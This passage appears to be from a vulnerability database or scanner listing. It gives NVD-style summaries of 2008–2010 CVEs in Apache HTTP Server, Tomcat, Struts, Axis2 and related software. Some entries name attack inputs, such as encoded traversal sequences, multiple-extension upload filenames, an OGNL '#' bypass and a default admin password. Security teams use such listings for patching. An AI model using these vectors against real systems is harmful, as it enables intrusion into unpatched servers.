| [CVE-2010-2791] mod_proxy in httpd in Apache HTTP Server 2.2.9, when running on Unix, does not close the backend connection if a timeout occurs when reading a response from a persistent connection, which allows remote attackers to obtain a potentially sensitive response intended for a different client in opportunistic circumstances via a normal HTTP request. NOTE: this is the same issue as CVE-2010-2068, but for a different OS and set of affected versions.
| [CVE-2010-2375] Package/Privilege: Plugins for Apache, Sun and IIS web servers Unspecified vulnerability in the WebLogic Server component in Oracle Fusion Middleware 7.0 SP7, 8.1 SP6, 9.0, 9.1, 9.2 MP3, 10.0 MP2, 10.3.2, and 10.3.3 allows remote attackers to affect confidentiality and integrity, related to IIS.
| [CVE-2010-2234] Cross-site request forgery (CSRF) vulnerability in Apache CouchDB 0.8.0 through 0.11.0 allows remote attackers to hijack the authentication of administrators for direct requests to an installation URL.
| [CVE-2010-2227] Apache Tomcat 5.5.0 through 5.5.29, 6.0.0 through 6.0.27, and 7.0.0 beta does not properly handle an invalid Transfer-Encoding header, which allows remote attackers to cause a denial of service (application outage) or obtain sensitive information via a crafted header that interferes with "recycling of a buffer."
| [CVE-2010-2103] Cross-site scripting (XSS) vulnerability in axis2-admin/axis2-admin/engagingglobally in the administration console in Apache Axis2/Java 1.4.1, 1.5.1, and possibly other versions, as used in SAP Business Objects 12, 3com IMC, and possibly other products, allows remote attackers to inject arbitrary web script or HTML via the modules parameter. NOTE: some of these details are obtained from third party information.
| [CVE-2010-2086] Apache MyFaces 1.1.7 and 1.2.8, as used in IBM WebSphere Application Server and other applications, does not properly handle an unencrypted view state, which allows remote attackers to conduct cross-site scripting (XSS) attacks or execute arbitrary Expression Language (EL) statements via vectors that involve modifying the serialized view object.
| [CVE-2010-2076] Apache CXF 2.0.x before 2.0.13, 2.1.x before 2.1.10, and 2.2.x before 2.2.9, as used in Apache ServiceMix, Apache Camel, Apache Chemistry, Apache jUDDI, Apache Geronimo, and other products, does not properly reject DTDs in SOAP messages, which allows remote attackers to read arbitrary files, send HTTP requests to intranet servers, or cause a denial of service (CPU and memory consumption) via a crafted DTD, as demonstrated by an entity declaration in a request to samples/wsdl_first_pure_xml, a similar issue to CVE-2010-1632.
| [CVE-2010-2068] mod_proxy_http.c in mod_proxy_http in the Apache HTTP Server 2.2.9 through 2.2.15, 2.3.4-alpha, and 2.3.5-alpha on Windows, NetWare, and OS/2, in certain configurations involving proxy worker pools, does not properly detect timeouts, which allows remote attackers to obtain a potentially sensitive response intended for a different client in opportunistic circumstances via a normal HTTP request.
| [CVE-2010-2057] shared/util/StateUtils.java in Apache MyFaces 1.1.x before 1.1.8, 1.2.x before 1.2.9, and 2.0.x before 2.0.1 uses an encrypted View State without a Message Authentication Code (MAC), which makes it easier for remote attackers to perform successful modifications of the View State via a padding oracle attack.
| [CVE-2010-1632] Apache Axis2 before 1.5.2, as used in IBM WebSphere Application Server (WAS) 7.0 through 7.0.0.12, IBM Feature Pack for Web Services 6.1.0.9 through 6.1.0.32, IBM Feature Pack for Web 2.0 1.0.1.0, Apache Synapse, Apache ODE, Apache Tuscany, Apache Geronimo, and other products, does not properly reject DTDs in SOAP messages, which allows remote attackers to read arbitrary files, send HTTP requests to intranet servers, or cause a denial of service (CPU and memory consumption) via a crafted DTD, as demonstrated by an entity declaration in a request to the Synapse SimpleStockQuoteService.
| [CVE-2010-1623] Memory leak in the apr_brigade_split_line function in buckets/apr_brigade.c in the Apache Portable Runtime Utility library (aka APR-util) before 1.3.10, as used in the mod_reqtimeout module in the Apache HTTP Server and other software, allows remote attackers to cause a denial of service (memory consumption) via unspecified vectors related to the destruction of an APR bucket.
| [CVE-2010-1587] The Jetty ResourceHandler in Apache ActiveMQ 5.x before 5.3.2 and 5.4.x before 5.4.0 allows remote attackers to read JSP source code via a // (slash slash) initial substring in a URI for (1) admin/index.jsp, (2) admin/queues.jsp, or (3) admin/topics.jsp.
| [CVE-2010-1452] The (1) mod_cache and (2) mod_dav modules in the Apache HTTP Server 2.2.x before 2.2.16 allow remote attackers to cause a denial of service (process crash) via a request that lacks a path.
| [CVE-2010-1325] Cross-site request forgery (CSRF) vulnerability in the apache2-slms package in SUSE Lifecycle Management Server (SLMS) 1.0 on SUSE Linux Enterprise (SLE) 11 allows remote attackers to hijack the authentication of unspecified victims via vectors related to improper parameter quoting. NOTE: some sources report that this is a vulnerability in a product named "Apache SLMS," but that is incorrect.
| [CVE-2010-1244] Cross-site request forgery (CSRF) vulnerability in createDestination.action in Apache ActiveMQ before 5.3.1 allows remote attackers to hijack the authentication of unspecified victims for requests that create queues via the JMSDestination parameter in a queue action.
| [CVE-2010-1157] Apache Tomcat 5.5.0 through 5.5.29 and 6.0.0 through 6.0.26 might allow remote attackers to discover the server's hostname or IP address by sending a request for a resource that requires (1) BASIC or (2) DIGEST authentication, and then reading the realm field in the WWW-Authenticate header in the reply.
| [CVE-2010-1151] Race condition in the mod_auth_shadow module for the Apache HTTP Server allows remote attackers to bypass authentication, and read and possibly modify data, via vectors related to improper interaction with an external helper application for validation of credentials.
| [CVE-2010-0684] Cross-site scripting (XSS) vulnerability in createDestination.action in Apache ActiveMQ before 5.3.1 allows remote authenticated users to inject arbitrary web script or HTML via the JMSDestination parameter in a queue action.
| [CVE-2010-0434] The ap_read_request function in server/protocol.c in the Apache HTTP Server 2.2.x before 2.2.15, when a multithreaded MPM is used, does not properly handle headers in subrequests in certain circumstances involving a parent request that has a body, which might allow remote attackers to obtain sensitive information via a crafted request that triggers access to memory locations associated with an earlier request.
| [CVE-2010-0432] Multiple cross-site scripting (XSS) vulnerabilities in the Apache Open For Business Project (aka OFBiz) 09.04 and earlier, as used in Opentaps, Neogia, and Entente Oya, allow remote attackers to inject arbitrary web script or HTML via (1) the productStoreId parameter to control/exportProductListing, (2) the partyId parameter to partymgr/control/viewprofile (aka partymgr/control/login), (3) the start parameter to myportal/control/showPortalPage, (4) an invalid URI beginning with /facility/control/ReceiveReturn (aka /crmsfa/control/ReceiveReturn or /cms/control/ReceiveReturn), (5) the contentId parameter (aka the entityName variable) to ecommerce/control/ViewBlogArticle, (6) the entityName parameter to webtools/control/FindGeneric, or the (7) subject or (8) content parameter to an unspecified component under ecommerce/control/contactus.
| [CVE-2010-0425] modules/arch/win32/mod_isapi.c in mod_isapi in the Apache HTTP Server 2.0.37 through 2.0.63, 2.2.0 through 2.2.14, and 2.3.x before 2.3.7, when running on Windows, does not ensure that request processing is complete before calling isapi_unload for an ISAPI .dll module, which allows remote attackers to execute arbitrary code via unspecified vectors related to a crafted request, a reset packet, and "orphaned callback pointers."
| [CVE-2010-0408] The ap_proxy_ajp_request function in mod_proxy_ajp.c in mod_proxy_ajp in the Apache HTTP Server 2.2.x before 2.2.15 does not properly handle certain situations in which a client sends no request body, which allows remote attackers to cause a denial of service (backend server outage) via a crafted request, related to use of a 500 error code instead of the appropriate 400 error code.
| [CVE-2010-0390] Unrestricted file upload vulnerability in maxImageUpload/index.php in PHP F1 Max's Image Uploader 1.0, when Apache is not configured to handle the mime-type for files with pjpeg or jpeg extensions, allows remote attackers to execute arbitrary code by uploading a file with a pjpeg or jpeg extension, then accessing it via a direct request to the file in original/. NOTE: some of these details are obtained from third party information.
| [CVE-2010-0219] Apache Axis2, as used in dswsbobje.war in SAP BusinessObjects Enterprise XI 3.2, CA ARCserve D2D r15, and other products, has a default password of axis2 for the admin account, which makes it easier for remote attackers to execute arbitrary code by uploading a crafted web service.
| [CVE-2010-0010] Integer overflow in the ap_proxy_send_fb function in proxy/proxy_util.c in mod_proxy in the Apache HTTP Server before 1.3.42 on 64-bit platforms allows remote origin servers to cause a denial of service (daemon crash) or possibly execute arbitrary code via a large chunk size that triggers a heap-based buffer overflow.
| [CVE-2010-0009] Apache CouchDB 0.8.0 through 0.10.1 allows remote attackers to obtain sensitive information by measuring the completion time of operations that verify (1) hashes or (2) passwords.
| [CVE-2009-5120] The default configuration of Apache Tomcat in Websense Manager in Websense Web Security 7.0 and Web Filter 7.0 allows connections to TCP port 1812 from arbitrary source IP addresses, which makes it easier for remote attackers to conduct cross-site scripting (XSS) attacks via UTF-7 text to the 404 error page of a Project Woodstock service on this port.
| [CVE-2009-5119] The default configuration of Apache Tomcat in Websense Manager in Websense Web Security 7.0 and Web Filter 7.0 enables weak SSL ciphers in conf/server.xml, which makes it easier for remote attackers to obtain sensitive information by sniffing the network and then conducting a brute-force attack against encrypted session data.
| [CVE-2009-5006] The SessionAdapter::ExchangeHandlerImpl::checkAlternate function in broker/SessionAdapter.cpp in the C++ Broker component in Apache Qpid before 0.6, as used in Red Hat Enterprise MRG before 1.3 and other products, allows remote authenticated users to cause a denial of service (NULL pointer dereference, daemon crash, and cluster outage) by attempting to modify the alternate of an exchange.
| [CVE-2009-5005] The Cluster::deliveredEvent function in cluster/Cluster.cpp in Apache Qpid, as used in Red Hat Enterprise MRG before 1.3 and other products, allows remote attackers to cause a denial of service (daemon crash and cluster outage) via invalid AMQP data.
| [CVE-2009-4355] Memory leak in the zlib_stateful_finish function in crypto/comp/c_zlib.c in OpenSSL 0.9.8l and earlier and 1.0.0 Beta through Beta 4 allows remote attackers to cause a denial of service (memory consumption) via vectors that trigger incorrect calls to the CRYPTO_cleanup_all_ex_data function, as demonstrated by use of SSLv3 and PHP with the Apache HTTP Server, a related issue to CVE-2008-1678.
| [CVE-2009-4269] The password hash generation algorithm in the BUILTIN authentication functionality for Apache Derby before 10.6.1.0 performs a transformation that reduces the size of the set of inputs to SHA-1, which produces a small search space that makes it easier for local and possibly remote attackers to crack passwords by generating hash collisions, related to password substitution.
| [CVE-2009-3923] The VirtualBox 2.0.8 and 2.0.10 web service in Sun Virtual Desktop Infrastructure (VDI) 3.0 does not require authentication, which allows remote attackers to obtain unspecified access via vectors involving requests to an Apache HTTP Server.
| [CVE-2009-3890] Unrestricted file upload vulnerability in the wp_check_filetype function in wp-includes/functions.php in WordPress before 2.8.6, when a certain configuration of the mod_mime module in the Apache HTTP Server is enabled, allows remote authenticated users to execute arbitrary code by posting an attachment with a multiple-extension filename, and then accessing this attachment via a direct request to a wp-content/uploads/ pathname, as demonstrated by a .php.jpg filename.
| [CVE-2009-3843] HP Operations Manager 8.10 on Windows contains a "hidden account" in the XML file that specifies Tomcat users, which allows remote attackers to conduct unrestricted file upload attacks, and thereby execute arbitrary code, by using the org.apache.catalina.manager.HTMLManagerServlet class to make requests to manager/html/upload.
| [CVE-2009-3821] Cross-site scripting (XSS) vulnerability in the Apache Solr Search (solr) extension 1.0.0 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
| [CVE-2009-3555] The TLS protocol, and the SSL protocol 3.0 and possibly earlier, as used in Microsoft Internet Information Services (IIS) 7.0, mod_ssl in the Apache HTTP Server 2.2.14 and earlier, OpenSSL before 0.9.8l, GnuTLS 2.8.5 and earlier, Mozilla Network Security Services (NSS) 3.12.4 and earlier, multiple Cisco products, and other products, does not properly associate renegotiation handshakes with an existing connection, which allows man-in-the-middle attackers to insert data into HTTPS sessions, and possibly other types of sessions protected by TLS or SSL, by sending an unauthenticated request that is processed retroactively by a server in a post-renegotiation context, related to a "plaintext injection" attack, aka the "Project Mogul" issue.
| [CVE-2009-3548] The Windows installer for Apache Tomcat 6.0.0 through 6.0.20, 5.5.0 through 5.5.28, and possibly earlier versions uses a blank default password for the administrative user, which allows remote attackers to gain privileges.
| [CVE-2009-3250] The saveForwardAttachments procedure in the Compose Mail functionality in vtiger CRM 5.0.4 allows remote authenticated users to execute arbitrary code by composing an e-mail message with an attachment filename ending in (1) .php in installations based on certain Apache HTTP Server configurations, (2) .php. on Windows, or (3) .php/ on Linux, and then making a direct request to a certain pathname under storage/.
| [CVE-2009-3095] The mod_proxy_ftp module in the Apache HTTP Server allows remote attackers to bypass intended access restrictions and send arbitrary commands to an FTP server via vectors related to the embedding of these commands in the Authorization HTTP header, as demonstrated by a certain module in VulnDisco Pack Professional 8.11.
| [CVE-2009-3094] The ap_proxy_ftp_handler function in modules/proxy/proxy_ftp.c in the mod_proxy_ftp module in the Apache HTTP Server 2.0.63 and 2.2.13 allows remote FTP servers to cause a denial of service (NULL pointer dereference and child process crash) via a malformed reply to an EPSV command.
| [CVE-2009-2902] Directory traversal vulnerability in Apache Tomcat 5.5.0 through 5.5.28 and 6.0.0 through 6.0.20 allows remote attackers to delete work-directory files via directory traversal sequences in a WAR filename, as demonstrated by the ...war filename.
| [CVE-2009-2901] The autodeployment process in Apache Tomcat 5.5.0 through 5.5.28 and 6.0.0 through 6.0.20, when autoDeploy is enabled, deploys appBase files that remain from a failed undeploy, which might allow remote attackers to bypass intended authentication requirements via HTTP requests.
| [CVE-2009-2823] The Apache HTTP Server in Apple Mac OS X before 10.6.2 enables the HTTP TRACE method, which allows remote attackers to conduct cross-site scripting (XSS) attacks via unspecified web client software.
| [CVE-2009-2699] The Solaris pollset feature in the Event Port backend in poll/unix/port.c in the Apache Portable Runtime (APR) library before 1.3.9, as used in the Apache HTTP Server before 2.2.14 and other products, does not properly handle errors, which allows remote attackers to cause a denial of service (daemon hang) via unspecified HTTP requests, related to the prefork and event MPMs.
| [CVE-2009-2696] Cross-site scripting (XSS) vulnerability in jsp/cal/cal2.jsp in the calendar application in the examples web application in Apache Tomcat on Red Hat Enterprise Linux 5, Desktop Workstation 5, and Linux Desktop 5 allows remote attackers to inject arbitrary web script or HTML via the time parameter, related to "invalid HTML." NOTE: this is due to a missing fix for CVE-2009-0781.
| [CVE-2009-2693] Directory traversal vulnerability in Apache Tomcat 5.5.0 through 5.5.28 and 6.0.0 through 6.0.20 allows remote attackers to create or overwrite arbitrary files via a .. (dot dot) in an entry in a WAR file, as demonstrated by a ../../bin/catalina.bat entry.
| [CVE-2009-2625] XMLScanner.java in Apache Xerces2 Java, as used in Sun Java Runtime Environment (JRE) in JDK and JRE 6 before Update 15 and JDK and JRE 5.0 before Update 20, and in other products, allows remote attackers to cause a denial of service (infinite loop and application hang) via malformed XML input, as demonstrated by the Codenomicon XML fuzzing framework.
| [CVE-2009-2412] Multiple integer overflows in the Apache Portable Runtime (APR) library and the Apache Portable Utility library (aka APR-util) 0.9.x and 1.3.x allow remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via vectors that trigger crafted calls to the (1) allocator_alloc or (2) apr_palloc function in memory/unix/apr_pools.c in APR
| [CVE-2009-2299] The Artofdefence Hyperguard Web Application Firewall (WAF) module before 2.5.5-11635, 3.0 before 3.0.3-11636, and 3.1 before 3.1.1-11637, a module for the Apache HTTP Server, allows remote attackers to cause a denial of service (memory consumption) via an HTTP request with a large Content-Length value but no POST data.
| [CVE-2009-1956] Off-by-one error in the apr_brigade_vprintf function in Apache APR-util before 1.3.5 on big-endian platforms allows remote attackers to obtain sensitive information or cause a denial of service (application crash) via crafted input.
| [CVE-2009-1955] The expat XML parser in the apr_xml_* interface in xml/apr_xml.c in Apache APR-util before 1.3.7, as used in the mod_dav and mod_dav_svn modules in the Apache HTTP Server, allows remote attackers to cause a denial of service (memory consumption) via a crafted XML document containing a large number of nested entity references, as demonstrated by a PROPFIND request, a similar issue to CVE-2003-1564.
| [CVE-2009-1903] The PDF XSS protection feature in ModSecurity before 2.5.8 allows remote attackers to cause a denial of service (Apache httpd crash) via a request for a PDF file that does not use the GET method.
| [CVE-2009-1891] The mod_deflate module in Apache httpd 2.2.11 and earlier compresses large files until completion even after the associated network connection is closed, which allows remote attackers to cause a denial of service (CPU consumption).
| [CVE-2009-1890] The stream_reqbody_cl function in mod_proxy_http.c in the mod_proxy module in the Apache HTTP Server before 2.3.3, when a reverse proxy is configured, does not properly handle an amount of streamed data that exceeds the Content-Length value, which allows remote attackers to cause a denial of service (CPU consumption) via crafted requests.
| [CVE-2009-1885] Stack consumption vulnerability in validators/DTD/DTDScanner.cpp in Apache Xerces C++ 2.7.0 and 2.8.0 allows context-dependent attackers to cause a denial of service (application crash) via vectors involving nested parentheses and invalid byte values in "simply nested DTD structures," as demonstrated by the Codenomicon XML fuzzing framework.
| [CVE-2009-1462] The Security Manager in razorCMS before 0.4 does not verify the permissions of every file owned by the apache user account, which is inconsistent with the documentation and allows local users to have an unspecified impact.
| [CVE-2009-1275] Apache Tiles 2.1 before 2.1.2, as used in Apache Struts and other products, evaluates Expression Language (EL) expressions twice in certain circumstances, which allows remote attackers to conduct cross-site scripting (XSS) attacks or obtain sensitive information via unspecified vectors, related to the (1) tiles:putAttribute and (2) tiles:insertTemplate JSP tags.
| [CVE-2009-1195] The Apache HTTP Server 2.2.11 and earlier 2.2 versions does not properly handle Options=IncludesNOEXEC in the AllowOverride directive, which allows local users to gain privileges by configuring (1) Options Includes, (2) Options +Includes, or (3) Options +IncludesNOEXEC in a .htaccess file, and then inserting an exec element in a .shtml file.
| [CVE-2009-1191] mod_proxy_ajp.c in the mod_proxy_ajp module in the Apache HTTP Server 2.2.11 allows remote attackers to obtain sensitive response data, intended for a client that sent an earlier POST request with no request body, via an HTTP request.
| [CVE-2009-1012] Unspecified vulnerability in the plug-ins for Apache and IIS web servers in Oracle BEA WebLogic Server 7.0 Gold through SP7, 8.1 Gold through SP6, 9.0, 9.1, 9.2 Gold through MP3, 10.0 Gold through MP1, and 10.3 allows remote attackers to affect confidentiality, integrity, and availability. NOTE: the previous information was obtained from the April 2009 CPU. Oracle has not commented on claims from a reliable researcher that this is an integer overflow in an unspecified plug-in that parses HTTP requests, which leads to a heap-based buffer overflow.
| [CVE-2009-0918] Multiple unspecified vulnerabilities in DFLabs PTK 1.0.0 through 1.0.4 allow remote attackers to execute arbitrary commands in processes launched by PTK's Apache HTTP Server via (1) "external tools" or (2) a crafted forensic image.
| [CVE-2009-0796] Cross-site scripting (XSS) vulnerability in Status.pm in Apache::Status and Apache2::Status in mod_perl1 and mod_perl2 for the Apache HTTP Server, when /perl-status is accessible, allows remote attackers to inject arbitrary web script or HTML via the URI.
| [CVE-2009-0783] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18 permits web applications to replace an XML parser used for other web applications, which allows local users to read or modify the (1) web.xml, (2) context.xml, or (3) tld files of arbitrary web applications via a crafted application that is loaded earlier than the target application.
| [CVE-2009-0781] Cross-site scripting (XSS) vulnerability in jsp/cal/cal2.jsp in the calendar application in the examples web application in Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18 allows remote attackers to inject arbitrary web script or HTML via the time parameter, related to "invalid HTML."
| [CVE-2009-0754] PHP 4.4.4, 5.1.6, and other versions, when running on Apache, allows local users to modify behavior of other sites hosted on the same web server by modifying the mbstring.func_overload setting within .htaccess, which causes this setting to be applied to other virtual hosts on the same server.
| [CVE-2009-0580] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18, when FORM authentication is used, allows remote attackers to enumerate valid usernames via requests to /j_security_check with malformed URL encoding of passwords, related to improper error checking in the (1) MemoryRealm, (2) DataSourceRealm, and (3) JDBCRealm authentication realms, as demonstrated by a % (percent) value for the j_password parameter.
| [CVE-2009-0486] Bugzilla 3.2.1, 3.0.7, and 3.3.2, when running under mod_perl, calls the srand function at startup time, which causes Apache children to have the same seed and produce insufficiently random numbers for random tokens, which allows remote attackers to bypass cross-site request forgery (CSRF) protection mechanisms and conduct unauthorized activities as other users.
| [CVE-2009-0039] Multiple cross-site request forgery (CSRF) vulnerabilities in the web administration console in Apache Geronimo Application Server 2.1 through 2.1.3 allow remote attackers to hijack the authentication of administrators for requests that (1) change the web administration password, (2) upload applications, and perform unspecified other administrative actions, as demonstrated by (3) a Shutdown request to console/portal//Server/Shutdown.
| [CVE-2009-0038] Multiple cross-site scripting (XSS) vulnerabilities in the web administration console in Apache Geronimo Application Server 2.1 through 2.1.3 allow remote attackers to inject arbitrary web script or HTML via the (1) name, (2) ip, (3) username, or (4) description parameter to console/portal/Server/Monitoring
| [CVE-2009-0033] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18, when the Java AJP connector and mod_jk load balancing are used, allows remote attackers to cause a denial of service (application outage) via a crafted request with invalid headers, related to temporary blocking of connectors that have encountered errors, as demonstrated by an error involving a malformed HTTP Host header.
8907| [CVE-2009-0026] Multiple cross-site scripting (XSS) vulnerabilities in Apache Jackrabbit before 1.5.2 allow remote attackers to inject arbitrary web script or HTML via the q parameter to (1) search.jsp or (2) swr.jsp.
8908| [CVE-2009-0023] The apr_strmatch_precompile function in strmatch/apr_strmatch.c in Apache APR-util before 1.3.5 allows remote attackers to cause a denial of service (daemon crash) via crafted input involving (1) a .htaccess file used with the Apache HTTP Server, (2) the SVNMasterURI directive in the mod_dav_svn module in the Apache HTTP Server, (3) the mod_apreq2 module for the Apache HTTP Server, or (4) an application that uses the libapreq2 library, which triggers a heap-based buffer underflow.
8909| [CVE-2008-6879] Cross-site scripting (XSS) vulnerability in Apache Roller 2.3, 3.0, 3.1, and 4.0 allows remote attackers to inject arbitrary web script or HTML via the q parameter in a search action.
8910| [CVE-2008-6755] ZoneMinder 1.23.3 on Fedora 10 sets the ownership of /etc/zm.conf to the apache user account, and sets the permissions to 0600, which makes it easier for remote attackers to modify this file by accessing it through a (1) PHP or (2) CGI script.
8911| [CVE-2008-6722] Novell Access Manager 3 SP4 does not properly expire X.509 certificate sessions, which allows physically proximate attackers to obtain a logged-in session by using a victim's web-browser process that continues to send the original and valid SSL sessionID, related to inability of Apache Tomcat to clear entries from its SSL cache.
8912| [CVE-2008-6682] Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 2.0.x before 2.0.11.1 and 2.1.x before 2.1.1 allow remote attackers to inject arbitrary web script or HTML via vectors associated with improper handling of (1) " (double quote) characters in the href attribute of an s:a tag and (2) parameters in the action attribute of an s:url tag.
8913| [CVE-2008-6505] Multiple directory traversal vulnerabilities in Apache Struts 2.0.x before 2.0.12 and 2.1.x before 2.1.3 allow remote attackers to read arbitrary files via a ..%252f (encoded dot dot slash) in a URI with a /struts/ path, related to (1) FilterDispatcher in 2.0.x and (2) DefaultStaticContentLoader in 2.1.x.
8914| [CVE-2008-6504] ParametersInterceptor in OpenSymphony XWork 2.0.x before 2.0.6 and 2.1.x before 2.1.2, as used in Apache Struts and other products, does not properly restrict # (pound sign) references to context objects, which allows remote attackers to execute Object-Graph Navigation Language (OGNL) statements and modify server-side context objects, as demonstrated by use of a \u0023 representation for the # character.
8915| [CVE-2008-5696] Novell NetWare 6.5 before Support Pack 8, when an OES2 Linux server is installed into the NDS tree, does not require a password for the ApacheAdmin console, which allows remote attackers to reconfigure the Apache HTTP Server via console operations.
8916| [CVE-2008-5676] Multiple unspecified vulnerabilities in the ModSecurity (aka mod_security) module 2.5.0 through 2.5.5 for the Apache HTTP Server, when SecCacheTransformations is enabled, allow remote attackers to cause a denial of service (daemon crash) or bypass the product's functionality via unknown vectors related to "transformation caching."
8917| [CVE-2008-5519] The JK Connector (aka mod_jk) 1.2.0 through 1.2.26 in Apache Tomcat allows remote attackers to obtain sensitive information via an arbitrary request from an HTTP client, in opportunistic circumstances involving (1) a request from a different client that included a Content-Length header but no POST data or (2) a rapid series of requests, related to noncompliance with the AJP protocol's requirements for requests containing Content-Length headers.
8918| [CVE-2008-5518] Multiple directory traversal vulnerabilities in the web administration console in Apache Geronimo Application Server 2.1 through 2.1.3 on Windows allow remote attackers to upload files to arbitrary directories via directory traversal sequences in the (1) group, (2) artifact, (3) version, or (4) fileType parameter to console/portal//Services/Repository (aka the Services/Repository portlet)
8919| [CVE-2008-5515] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, 6.0.0 through 6.0.18, and possibly earlier versions normalizes the target pathname before filtering the query string when using the RequestDispatcher method, which allows remote attackers to bypass intended access restrictions and conduct directory traversal attacks via .. (dot dot) sequences and the WEB-INF directory in a Request.
8920| [CVE-2008-5457] Unspecified vulnerability in the Oracle BEA WebLogic Server Plugins for Apache, Sun and IIS web servers component in BEA Product Suite 10.3, 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, and 7.0 SP7 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
8921| [CVE-2008-4308] The doRead method in Apache Tomcat 4.1.32 through 4.1.34 and 5.5.10 through 5.5.20 does not return a -1 to indicate when a certain error condition has occurred, which can cause Tomcat to send POST content from one request to a different request.
8922| [CVE-2008-4008] Unspecified vulnerability in the WebLogic Server Plugins for Apache component in BEA Product Suite 10.3, 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, 7.0 SP7, and 6.1 SP7 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors. NOTE: the previous information was obtained from the October 2008 CPU. Oracle has not commented on reliable researcher claims that this issue is a stack-based buffer overflow in the WebLogic Apache Connector, related to an invalid parameter.
8923| [CVE-2008-3666] Unspecified vulnerability in Sun Solaris 10 and OpenSolaris before snv_96 allows (1) context-dependent attackers to cause a denial of service (panic) via vectors involving creation of a crafted file and use of the sendfilev system call, as demonstrated by a file served by an Apache 2.2.x web server with EnableSendFile configured
8924| [CVE-2008-3271] Apache Tomcat 5.5.0 and 4.1.0 through 4.1.31 allows remote attackers to bypass an IP address restriction and obtain sensitive information via a request that is processed concurrently with another request but in a different thread, leading to an instance-variable overwrite associated with a "synchronization problem" and lack of thread safety, and related to RemoteFilterValve, RemoteAddrValve, and RemoteHostValve.
8925| [CVE-2008-3257] Stack-based buffer overflow in the Apache Connector (mod_wl) in Oracle WebLogic Server (formerly BEA WebLogic Server) 10.3 and earlier allows remote attackers to execute arbitrary code via a long HTTP version string, as demonstrated by a string after "POST /.jsp" in an HTTP request.
8926| [CVE-2008-2939] Cross-site scripting (XSS) vulnerability in proxy_ftp.c in the mod_proxy_ftp module in Apache 2.0.63 and earlier, and mod_proxy_ftp.c in the mod_proxy_ftp module in Apache 2.2.9 and earlier 2.2 versions, allows remote attackers to inject arbitrary web script or HTML via a wildcard in the last directory component in the pathname in an FTP URI.
8927| [CVE-2008-2938] Directory traversal vulnerability in Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16, when allowLinking and UTF-8 are enabled, allows remote attackers to read arbitrary files via encoded directory traversal sequences in the URI, a different vulnerability than CVE-2008-2370. NOTE: versions earlier than 6.0.18 were reported affected, but the vendor advisory lists 6.0.16 as the last affected version.
8928| [CVE-2008-2742] Unrestricted file upload in the mcpuk file editor (atk/attributes/fck/editor/filemanager/browser/mcpuk/connectors/php/config.php) in Achievo 1.2.0 through 1.3.2 allows remote attackers to execute arbitrary code by uploading a file with .php followed by a safe extension, then accessing it via a direct request to the file in the Achievo root directory. NOTE: this is only a vulnerability in environments that support multiple extensions, such as Apache with the mod_mime module enabled.
8929| [CVE-2008-2717] TYPO3 4.0.x before 4.0.9, 4.1.x before 4.1.7, and 4.2.x before 4.2.1, uses an insufficiently restrictive default fileDenyPattern for Apache, which allows remote attackers bypass security restrictions and upload configuration files such as .htaccess, or conduct file upload attacks using multiple extensions.
8930| [CVE-2008-2579] Unspecified vulnerability in the WebLogic Server Plugins for Apache, Sun and IIS web servers component in Oracle BEA Product Suite 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, 7.0 SP7, and 6.1 SP7 has unknown impact and remote attack vectors.
8931| [CVE-2008-2384] SQL injection vulnerability in mod_auth_mysql.c in the mod-auth-mysql (aka libapache2-mod-auth-mysql) module for the Apache HTTP Server 2.x, when configured to use a multibyte character set that allows a \ (backslash) as part of the character encoding, allows remote attackers to execute arbitrary SQL commands via unspecified inputs in a login request.
8932| [CVE-2008-2370] Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16, when a RequestDispatcher is used, performs path normalization before removing the query string from the URI, which allows remote attackers to conduct directory traversal attacks and read arbitrary files via a .. (dot dot) in a request parameter.
8933| [CVE-2008-2364] The ap_proxy_http_process_response function in mod_proxy_http.c in the mod_proxy module in the Apache HTTP Server 2.0.63 and 2.2.8 does not limit the number of forwarded interim responses, which allows remote HTTP servers to cause a denial of service (memory consumption) via a large number of interim responses.
8934| [CVE-2008-2168] Cross-site scripting (XSS) vulnerability in Apache 2.2.6 and earlier allows remote attackers to inject arbitrary web script or HTML via UTF-7 encoded URLs that are not properly handled when displaying the 403 Forbidden error page.
8935| [CVE-2008-2025] Cross-site scripting (XSS) vulnerability in Apache Struts before 1.2.9-162.31.1 on SUSE Linux Enterprise (SLE) 11, before 1.2.9-108.2 on SUSE openSUSE 10.3, before 1.2.9-198.2 on SUSE openSUSE 11.0, and before 1.2.9-162.163.2 on SUSE openSUSE 11.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to "insufficient quoting of parameters."
8936| [CVE-2008-1947] Cross-site scripting (XSS) vulnerability in Apache Tomcat 5.5.9 through 5.5.26 and 6.0.0 through 6.0.16 allows remote attackers to inject arbitrary web script or HTML via the name parameter (aka the hostname attribute) to host-manager/html/add.
8937| [CVE-2008-1734] Interpretation conflict in PHP Toolkit before 1.0.1 on Gentoo Linux might allow local users to cause a denial of service (PHP outage) and read contents of PHP scripts by creating a file with a one-letter lowercase alphabetic name, which triggers interpretation of a certain unquoted [a-z] argument as a matching shell glob for this name, rather than interpretation as the literal [a-z] regular-expression string, and consequently blocks the launch of the PHP interpreter within the Apache HTTP Server.
8938| [CVE-2008-1678] Memory leak in the zlib_stateful_init function in crypto/comp/c_zlib.c in libssl in OpenSSL 0.9.8f through 0.9.8h allows remote attackers to cause a denial of service (memory consumption) via multiple calls, as demonstrated by initial SSL client handshakes to the Apache HTTP Server mod_ssl that specify a compression algorithm.
